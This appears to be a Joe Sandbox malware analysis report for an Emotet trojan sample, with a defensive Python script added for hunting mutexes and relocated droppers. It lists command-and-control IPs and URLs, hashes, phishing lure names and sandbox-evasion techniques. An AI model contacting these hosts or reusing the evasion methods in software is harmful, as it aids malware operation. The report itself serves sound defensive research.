Source: C:\Users\user\Desktop\zeD11Fztx8.exe | PE file moved: C:\Windows\SysWOW64\storageservice.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | File opened: C:\Windows\SysWOW64\storageservice.exe:Zone.Identifier (access: read attributes | delete)

Malware Analysis System Evasion:

Found evasive API chain (may stop execution after checking mutex)
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Evasive API call chain: CreateMutex, DecisionNodes, ExitProcess (graph_0-14797)
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | API coverage: 6.5 %
Program does not show much activity (idle)
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | File Volume queried: C:\ FullSizeInformation
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: storageservice.exe, 00000003.00000003.827346434.0000000001096000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW(N
Source: svchost.exe, 0000000D.00000002.841710504.000001EEB86B0000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.880141754.000002BBEBD40000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
(The svchost.exe entries above are Windows' own Hyper-V error messages found in system processes, not strings from the sample; the one environment probe in this list attributable to the sample is the query of the VMware SATA CD-ROM device path.)
Source: C:\Windows\SysWOW64\storageservice.exe | Process information queried: ProcessInformation
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_01381F40: VirtualAlloc, memcpy, memcpy, LoadLibraryA, GetProcAddress, VirtualFree
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_01381BE0: mov eax, dword ptr fs:[00000030h]
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_013815B0: GetModuleFileNameW, _snwprintf, GetProcessHeap, HeapFree, _snwprintf, GetProcessHeap, HeapFree, CreateEventW, CreateMutexW, CloseHandle, GetLastError, SetEvent, CloseHandle, CloseHandle, memset, CreateProcessW, WaitForSingleObject, CloseHandle, CloseHandle, CloseHandle, CloseHandle
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\storageservice.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\zeD11Fztx8.exe | Code function: 0_2_01388D50: RtlGetVersion, GetNativeSystemInfo
Source: C:\Windows\SysWOW64\storageservice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
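The mutex names in the System Summary and the CreateMutex / ExitProcess chain above fit together. The dropper, running in the user's session, creates \Sessions\1\BaseNamedObjects\Global\I7AD90449; the copy launched from C:\Windows\SysWOW64 creates \BaseNamedObjects\Global\I7AD90449. Because the Global\ prefix always resolves to the \BaseNamedObjects directory, those two are the same kernel object, which is how the second instance learns (via ERROR_ALREADY_EXISTS after CreateMutexW) that the first is still alive; the absence of a \Sessions\N component in the SysWOW64 copy's paths also shows it ran in session 0. The function at 0_2_013815B0 (CreateEventW, CreateMutexW, GetLastError, CreateProcessW, WaitForSingleObject) is the routine that does this hand-off, matching the self-respawn in the process tree, and the same MD5 appearing under both the Desktop and the SysWOW64 path is the moved file (the PE was moved, not copied, so its Zone.Identifier stream travelled with it and had to be deleted). The Python below is an added example written for this page, not part of the Joe Sandbox report: it resolves the reported object paths the way the object manager does, finds the objects shared across processes, groups the names by their hex suffix, and pairs the startup tree's hashes with their paths. Its inputs are copied from the report above.

```python
import re
from collections import defaultdict

# (creating process, object path) copied from the "Mutant created" findings in the System Summary.
MUTEXES = [
    ("zeD11Fztx8.exe", r"\Sessions\1\BaseNamedObjects\Global\I7AD90449"),
    ("storageservice.exe", r"\BaseNamedObjects\Global\I7AD90449"),
    ("storageservice.exe", r"\BaseNamedObjects\M7B1EF2AC"),
    ("zeD11Fztx8.exe", r"\Sessions\1\BaseNamedObjects\Global\M7AD90449"),
    ("zeD11Fztx8.exe", r"\Sessions\1\BaseNamedObjects\MAA169F89"),
]

# (pid, image path, MD5) copied from the Startup tree; svchost.exe kept as a control.
STARTUP = [
    (6720, r"C:\Users\user\Desktop\zeD11Fztx8.exe", "ECBC4B40DCFEC4ED1B2647B217DA0441"),
    (6728, r"C:\Users\user\Desktop\zeD11Fztx8.exe", "ECBC4B40DCFEC4ED1B2647B217DA0441"),
    (6812, r"C:\Windows\SysWOW64\storageservice.exe", "ECBC4B40DCFEC4ED1B2647B217DA0441"),
    (6828, r"C:\Windows\SysWOW64\storageservice.exe", "ECBC4B40DCFEC4ED1B2647B217DA0441"),
    (4800, r"C:\Windows\System32\svchost.exe", "32569E403279B3FD2EDB7EBD036273FA"),
]

OBJ_RE = re.compile(r"^\\(?:Sessions\\(\d+)\\)?BaseNamedObjects\\(?:(Global|Local)\\)?([^\\]+)$")


def canonical_object_path(path):
    """Resolve a BaseNamedObjects path the way the object manager does: Global names always
    live in the BaseNamedObjects root (the session-0 directory); unprefixed or Local names live
    in the creator's session directory, which for session 0 is that same root."""
    m = OBJ_RE.match(path)
    if not m:
        raise ValueError("not a BaseNamedObjects path: " + path)
    session, scope, name = m.groups()
    if scope == "Global" or session is None:
        return "\\BaseNamedObjects\\" + name
    return "\\Sessions\\" + session + "\\BaseNamedObjects\\" + name


def group_by_object(records):
    """{canonical object path: {process names that created it}}"""
    objects = defaultdict(set)
    for process, path in records:
        objects[canonical_object_path(path)].add(process)
    return dict(objects)


def shared_objects(objects):
    """Objects created by more than one process: the later creator gets ERROR_ALREADY_EXISTS,
    which is the decision the CreateMutex -> ExitProcess chain keys on."""
    return sorted(path for path, procs in objects.items() if len(procs) > 1)


def name_suffix_groups(records):
    """Group single-letter-prefix + 8-hex-digit object names by their hex suffix."""
    groups = defaultdict(set)
    for _, path in records:
        name = canonical_object_path(path).rsplit("\\", 1)[1]
        m = re.fullmatch(r"([A-Z])([0-9A-F]{8})", name)
        if m:
            groups[m.group(2)].add(m.group(1))
    return {suffix: sorted(prefixes) for suffix, prefixes in groups.items()}


def paths_by_hash(startup):
    """{MD5: sorted image paths}"""
    paths = defaultdict(set)
    for _, image, md5 in startup:
        paths[md5.upper()].add(image)
    return {md5: sorted(p) for md5, p in paths.items()}


def relocated_binaries(startup):
    """Hashes that executed from more than one path: the dropper and its moved copy."""
    return {md5: p for md5, p in paths_by_hash(startup).items() if len(p) > 1}


if __name__ == "__main__":
    objects = group_by_object(MUTEXES)
    for path, procs in sorted(objects.items()):
        print(path, "<-", sorted(procs))
    print("shared across processes:", shared_objects(objects))
    print("name groups:", name_suffix_groups(MUTEXES))
    print("same hash, several paths:", relocated_binaries(STARTUP))
```

For hunting, the canonical names are what to search for in EDR mutex telemetry (the \Sessions\N prefix varies with the logged-on session and is not part of the name), and the hash-under-two-paths check is a generic way to pull self-relocating droppers out of a process tree without knowing the family.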

Stealing of Sensitive Information:

Yara detected Emotet
Source: Yara match | same sources as listed under E-Banking Fraud above (the sample, eight memory dumps and eight unpacked PEs)

Mitre Att&ck Matrix

Techniques with matched signatures, by tactic (the number after each technique is reproduced as rendered next to it in the matrix; the matrix's remaining cells are unmatched template entries and are omitted here):

Execution: Native API (11)
Privilege Escalation: Process Injection (1)
Defense Evasion: Masquerading (12), Virtualization/Sandbox Evasion (1), Process Injection (1), Hidden Files and Directories (1), File Deletion (1)
Credential Access: Input Capture (1)
Discovery: Security Software Discovery (21), Virtualization/Sandbox Evasion (1), Process Discovery (2), File and Directory Discovery (1), System Information Discovery (14)
Collection: Input Capture (1), Archive Collected Data (1)
Command and Control: Encrypted Channel (12), Non-Standard Port (1), Non-Application Layer Protocol (1), Application Layer Protocol (12)


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    Source | Detection | Scanner | Label
                    zeD11Fztx8.exe | 83% | Virustotal |
                    zeD11Fztx8.exe | 97% | ReversingLabs | Win32.Trojan.Emotet
                    zeD11Fztx8.exe | 100% | Avira | TR/Crypt.XPACK.Gen
                    zeD11Fztx8.exe | 100% | Joe Sandbox ML |

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

                    Source | Detection | Scanner | Label
                    2.0.storageservice.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    3.2.storageservice.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    0.0.zeD11Fztx8.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.0.zeD11Fztx8.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    3.0.storageservice.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    1.2.zeD11Fztx8.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    2.2.storageservice.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
                    0.2.zeD11Fztx8.exe.1380000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

                    Domains

                    No Antivirus matches

                    URLs

                    Source | Detection | Scanner | Label
                    http://173.230.145.224:8080/ | 6% | Virustotal |
                    http://173.230.145.224:8080/ | 0% | Avira URL Cloud | safe
                    http://173.230.145.224:8080/gP | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/ | 6% | Virustotal |
                    http://80.86.91.232:7080/ | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/h | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/G | 0% | Avira URL Cloud | safe
                    https://79.172.249.82:443/ | 0% | Avira URL Cloud | safe
                    http://193.169.54.12:8080/ | 0% | Avira URL Cloud | safe
                    http://79.172.249.82:443/$ | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/24 | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/ed | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/7 | 0% | Avira URL Cloud | safe
                    http://79.172.249.82:443/ | 0% | Avira URL Cloud | safe
                    http://80.86.91.232:7080/9.54.12:8080/; | 0% | Avira URL Cloud | safe
                    http://173.230.145.224:8080/m | 0% | Avira URL Cloud | safe
                    http://193.169.54.12:8080// | 0% | Avira URL Cloud | safe

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    Name | Malicious | Antivirus Detection | Reputation
                    https://79.172.249.82:443/ | false | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

                    Name | Source | Malicious | Antivirus Detection | Reputation
                    http://173.230.145.224:8080/ | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | true | 6%, Virustotal; Avira URL Cloud: safe | unknown
                    http://173.230.145.224:8080/gP | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/ | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | 6%, Virustotal; Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/h | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/G | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://193.169.54.12:8080/ | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://79.172.249.82:443/$ | storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/24 | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/ed | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/7 | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://79.172.249.82:443/ | storageservice.exe, 00000003.00000002.898800934.0000000001048000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://80.86.91.232:7080/9.54.12:8080/; | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
                    http://173.230.145.224:8080/m | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | true | Avira URL Cloud: safe | unknown
                    http://193.169.54.12:8080// | storageservice.exe, 00000003.00000002.898823671.000000000105A000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown

                    Contacted IPs


                    Public

                    IP | Domain | Country | ASN | ASN Name | Malicious
                    193.169.54.12 | unknown | Germany | 49464 | ICFSYSTEMSDE | false
                    80.86.91.232 | unknown | Germany | 8972 | GD-EMEA-DC-SXB1DE | false
                    173.230.145.224 | unknown | United States | 63949 | LINODE-APLinodeLLCUS | false
                    79.172.249.82 | unknown | Hungary | 43711 | SZERVERNET-HU-ASHU | false

                    General Information

                    Joe Sandbox Version: 31.0.0 Emerald
                    Analysis ID: 384980
                    Start date: 10.04.2021
                    Start time: 18:47:04
                    Joe Sandbox Product: CloudBasic
                    Overall analysis duration: 0h 5m 46s
                    Hypervisor based Inspection enabled: false
                    Report type: full
                    Sample file name: zeD11Fztx8 (renamed file extension from none to exe)
                    Cookbook file name: default.jbs
                    Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of new started processes analysed: 22
                    Number of new started drivers analysed: 0
                    Number of existing processes analysed: 0
                    Number of existing drivers analysed: 0
                    Number of injected processes analysed: 0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode: default
                    Analysis stop reason: Timeout
                    Detection: MAL
                    Classification: mal96.troj.evad.winEXE@9/0@0/4
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 42.7% (good quality ratio 39%)
                    • Quality average: 79%
                    • Quality standard deviation: 30.4%
                    HCA Information: Failed
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    Simulations

                    Behavior and APIs

                    No simulations

                    Joe Sandbox View / Context

                    IPs

                    Match | Associated Sample Name / URL | Detection | Context
                    193.169.54.12:
                    • _01_.doc | malicious | 193.169.54.12:8080/
                    • hEHN0WzBF.exe | malicious | 193.169.54.12:8080/
                    • Outstanding Invoices.doc | malicious | 193.169.54.12:8080/
                    • Outstanding Invoices.doc | malicious | 193.169.54.12:8080/
                    • http://baseballpontedipiave.com/Sales-Invoice/ | malicious | 193.169.54.12:8080/
                    • emotet2.doc | malicious | 193.169.54.12:8080/
                    • 20180212-20_46_01_.doc | malicious | 193.169.54.12:8080/
                    • http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/ | malicious | 193.169.54.12:8080/
                    • SalesInvoice.doc | malicious | 193.169.54.12:8080/
                    • SalesInvoice.doc | malicious | 193.169.54.12:8080/
                    • mj03dyvx_2076767.exe | malicious | 193.169.54.12:8080/
                    • Scan1782384.doc | malicious | 193.169.54.12:8080/
                    • Scan1782384.doc | malicious | 193.169.54.12:8080/
                    • RDuYHvb2jQ.exe | malicious | 193.169.54.12:8080/
                    • Outstanding Invoices.doc | malicious | 193.169.54.12:8080/
                    • Outstanding Invoices.doc | malicious | 193.169.54.12:8080/
                    • http://okomekai.symphonic-net.com/Invoice-69070770/ | malicious | 193.169.54.12:8080/
                    • Outstanding invoice.doc | malicious | 193.169.54.12:8080/
                    • Outstanding invoice.doc | malicious | 193.169.54.12:8080/
                    • mail.rodolfogvalencia.com/Invoice/ | malicious | 193.169.54.12:8080/
                    80.86.91.232:
                    • Invoice.doc | malicious | 80.86.91.232:4143/
                    • Overdue payment.doc | malicious | 80.86.91.232:4143/
                    • Emotet.doc | malicious | 80.86.91.232:4143/
                    • Outstanding Invoices.doc | malicious | 80.86.91.232:4143/
                    • Outstanding Invoices.doc | malicious | 80.86.91.232:4143/
                    • Emote.exe | malicious | 80.86.91.232:4143/
                    • Question.doc | malicious | 80.86.91.232:4143/
                    • emotet.doc | malicious | 80.86.91.232:4143/
                    • Paypal.doc | malicious | 80.86.91.232:4143/
                    • Paypal.doc | malicious | 80.86.91.232:4143/
                    • emotet.doc | malicious | 80.86.91.232:4143/
                    • emotet.doc | malicious | 80.86.91.232:4143/
                    • 960-27-621120-257 & 960-27-621120-969.doc | malicious | 80.86.91.232:4143/
                    • Rechnung.doc | malicious | 80.86.91.232:4143/
                    • Open invoices.doc | malicious | 80.86.91.232:4143/
                    • 20180212-20_46_01_.doc | malicious | 80.86.91.232:7080/
                    • SalesInvoice.doc | malicious | 80.86.91.232:7080/
                    • SalesInvoice.doc | malicious | 80.86.91.232:7080/
                    • mj03dyvx_2076767.exe | malicious | 80.86.91.232:7080/
                    • Scan1782384.doc | malicious | 80.86.91.232:7080/

                    Domains

                    No context

                    ASN

                    Match | Associated Sample Name / URL | Detection | Context
                    GD-EMEA-DC-SXB1DE:
                    • TRS-11-0221-020.exe | malicious | 85.25.177.199
                    • Payment Advice.exe | malicious | 85.25.177.199
                    • VMtEguRH.exe | malicious | 85.25.177.199
                    • Reports-018315.xlsm | malicious | 185.21.102.197
                    • Reports-018315.xlsm | malicious | 185.21.102.197
                    • D12547698.VBS | malicious | 85.25.93.141
                    • sample.exe.exe | malicious | 80.86.91.232
                    • 5zc9vbGBo3.exe | malicious | 217.172.179.54
                    • InnAcjnAmG.exe | malicious | 217.172.179.54
                    • yxghUyIGb4.exe | malicious | 80.86.91.232
                    • TaTYytHaBk.exe | malicious | 85.25.43.31
                    • 8X93Tzvd7V.exe | malicious | 217.172.179.54
                    • u8A8Qy5S7O.exe | malicious | 217.172.179.54
                    • SecuriteInfo.com.Mal.GandCrypt-A.24654.exe | malicious | 217.172.179.54
                    • SecuriteInfo.com.Mal.GandCrypt-A.5674.exe | malicious | 217.172.179.54
                    • csrss.bin.exe | malicious | 188.138.33.233
                    • yx8DBT3r5r.exe | malicious | 92.51.129.66
                    • E00636067E.exe | malicious | 85.25.177.199
                    • http___contributeindustry.com_js_engine-rawbin.exe | malicious | 85.25.177.199
                    • z2xQEFs54b.exe | malicious | 87.230.93.218
                    ICFSYSTEMSDE:
                    • 9fdUNaHzLv.exe | malicious | 193.169.54.12
                    • sample.exe.exe | malicious | 193.169.54.12
                    • yxghUyIGb4.exe | malicious | 193.169.54.12
                    • 0HvIGwMmBV.exe | malicious | 193.169.54.12
                    • pitEBNziGR.exe | malicious | 193.169.54.12
                    • _01_.doc | malicious | 193.169.54.12
                    • hEHN0WzBF.exe | malicious | 193.169.54.12
                    • Outstanding Invoices.doc | malicious | 193.169.54.12
                    • Outstanding Invoices.doc | malicious | 193.169.54.12
                    • http://baseballpontedipiave.com/Sales-Invoice/ | malicious | 193.169.54.12
                    • emotet2.doc | malicious | 193.169.54.12
                    • 20180212-20_46_01_.doc | malicious | 193.169.54.12
                    • http://www.yourhabitchangecoach.co.uk/wp-content/Overdue-payment/ | malicious | 193.169.54.12
                    • SalesInvoice.doc | malicious | 193.169.54.12
                    • SalesInvoice.doc | malicious | 193.169.54.12
                    • mj03dyvx_2076767.exe | malicious | 193.169.54.12
                    • Scan1782384.doc | malicious | 193.169.54.12
                    • Scan1782384.doc | malicious | 193.169.54.12
                    • RDuYHvb2jQ.exe | malicious | 193.169.54.12
                    • Outstanding Invoices.doc | malicious | 193.169.54.12
                    LINODE-APLinodeLLCUS:
                    • CNTR-NO-GLDU7267089.xlsx | malicious | 45.56.127.45
                    • gunzipped.exe | malicious | 45.56.119.148
                    • frox0cheats.exe | malicious | 176.58.123.25
                    • nDHV6wKWHF.exe | malicious | 172.104.164.58
                    • OfficeConsultPlugin.exe | malicious | 109.237.24.104
                    • RFQ#798606.exe | malicious | 45.56.119.148
                    • Private doc.docm | malicious | 109.237.24.104
                    • lK8vF3n2e7.exe | malicious | 172.104.233.225
                    • newordermx.exe | malicious | 45.33.2.79
                    • sample.exe | malicious | 66.228.32.51
                    • BnJvVt951o.exe | malicious | 45.33.54.74
                    • BnJvVt951o.exe | malicious | 45.33.54.74
                    • SMtbg7yHyR.exe | malicious | 45.33.54.74
                    • 9fdUNaHzLv.exe | malicious | 173.230.145.224
                    • Private doc.docm | malicious | 212.71.251.238
                    • invoice_document.docm | malicious | 212.71.251.238
                    • sample.exe.exe | malicious | 173.230.145.224
                    • Document_Opener.exe.14.exe | malicious | 88.80.186.210
                    • Audio playback (7656) for joew Camrosa.htm | malicious | 192.81.132.201
                    • Paymonth invoice.exe | malicious | 45.79.19.196

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    No context

                    Created / dropped Files

                    No created / dropped files found

                    Static File Info

                    General

                    File type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit): 6.436116781781946
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name: zeD11Fztx8.exe
                    File size: 45568
                    MD5: ecbc4b40dcfec4ed1b2647b217da0441
                    SHA1: e08eb07c69d8fc8e75927597767288a21d6ed7f6
                    SHA256: 878d5137e0c9a072c83c596b4e80f2aa52a8580ef214e5ba0d59daa5036a92f8
                    SHA512: 3ec4de3f35e10c874916a6402004e3b9fc60b5a026d20100ede992b592fe396db2bee0b225ab5f2fb85561f687a8abf0c9e7c8b3cf0344c384c80297278be7b5
                    SSDEEP: 768:uhBY2Tumxi0mv/LWT3uBoGMUslwORSSrUBqvWzNQRC1s:ABxT6jW7uBgyOvWS
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..h...h...h.......h...i...h.......h.......h.Rich..h.................PE..L...7.]Z..........................................@

                    File Icon

                    Icon Hash: 00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint: 0x409ee0
                    Entrypoint Section: .text
                    Digitally signed: false
                    Imagebase: 0x400000
                    Subsystem: windows gui
                    Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp: 0x5A5DA737 [Tue Jan 16 07:18:15 2018 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major: 5
                    OS Version Minor: 1
                    File Version Major: 5
                    File Version Minor: 1
                    Subsystem Version Major: 5
                    Subsystem Version Minor: 1
                    Import Hash: 4cfe8bbfb0ca5b84bbad08b043ea0c87

                    Entrypoint Preview

                    Instruction
                    push esi
                    push 0040C1F0h
                    push 3966646Ch
                    push 00000009h
                    mov ecx, D22E2014h
                    call 00007F2560F1290Eh
                    mov edx, 004011F0h
                    mov ecx, eax
                    call 00007F2560F12832h
                    add esp, 0Ch
                    mov ecx, 8F7EE672h
                    push 0040C0D0h
                    push 6677A1D2h
                    push 00000048h
                    call 00007F2560F128E9h
                    mov edx, 004010D0h
                    mov ecx, eax
                    call 00007F2560F1280Dh
                    add esp, 0Ch
                    push 08000000h
                    push 00000000h
                    call dword ptr [0040C1A8h]
                    push eax
                    call dword ptr [0040C10Ch]
                    mov esi, eax
                    test esi, esi
                    je 00007F2560F1AC48h
                    push 08000000h
                    push 00000000h
                    push esi
                    call dword ptr [0040C1F8h]
                    add esp, 0Ch
                    push esi
                    push 00000000h
                    call dword ptr [0040C1A8h]
                    push eax
                    call dword ptr [0040C1E8h]
                    call 00007F2560F1226Ah
                    push 00000000h
                    call dword ptr [0040C1ACh]
                    pop esi
                    ret
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    int3
                    push ebp
                    mov ebp, esp
                    sub esp, 0Ch
                    push ebx
                    push esi
                    push edi
                    mov edi, edx
                    mov dword ptr [ebp-0Ch], ecx
                    mov esi, 00000001h
                    mov dword ptr [ebp-08h], esi
                    mov eax, dword ptr [edi]
                    cmp eax, 7Fh
                    jbe 00007F2560F1AC31h
                    lea ecx, dword ptr [ecx+00h]
                    shr eax, 07h
                    inc esi
                    cmp eax, 7Fh

                    Rich Headers

                    Programming Language:
                    • [LNK] VS2013 UPD4 build 31101
                    • [IMP] VS2008 SP1 build 30729

                    Data Directories

                    Name | Virtual Address | Virtual Size | Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbad0 | 0x28 | .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xd000 | 0x5cc | .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_IAT | 0xb000 | 0x8 | .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                    Sections

                    Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                    .text | 0x1000 | 0x9883 | 0x9a00 | False | 0.503297483766 | data | 6.45508103349 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                    .rdata | 0xb000 | 0xb2e | 0xc00 | False | 0.160807291667 | data | 4.23495809712 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data | 0xc000 | 0xbd8 | 0x200 | False | 0.123046875 | data | 0.91267432928 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                    .reloc | 0xd000 | 0x5cc | 0x600 | False | 0.8671875 | data | 6.49434732961 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                    Imports

                    DLL | Import
                    KERNEL32.dll | WTSGetActiveConsoleSessionId

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Apr 10, 2021 18:47:54.465001106 CEST | 49738 | 443 | 192.168.2.4 | 79.172.249.82
                    Apr 10, 2021 18:47:54.500535011 CEST | 443 | 49738 | 79.172.249.82 | 192.168.2.4
                    Apr 10, 2021 18:47:54.500761032 CEST | 49738 | 443 | 192.168.2.4 | 79.172.249.82
                    Apr 10, 2021 18:47:54.501919985 CEST | 49738 | 443 | 192.168.2.4 | 79.172.249.82
                    Apr 10, 2021 18:47:54.537208080 CEST | 443 | 49738 | 79.172.249.82 | 192.168.2.4
                    Apr 10, 2021 18:47:54.537532091 CEST | 443 | 49738 | 79.172.249.82 | 192.168.2.4
                    Apr 10, 2021 18:47:54.537558079 CEST | 443 | 49738 | 79.172.249.82 | 192.168.2.4
                    Apr 10, 2021 18:47:54.537693977 CEST | 49738 | 443 | 192.168.2.4 | 79.172.249.82
                    Apr 10, 2021 18:47:54.537740946 CEST | 49738 | 443 | 192.168.2.4 | 79.172.249.82
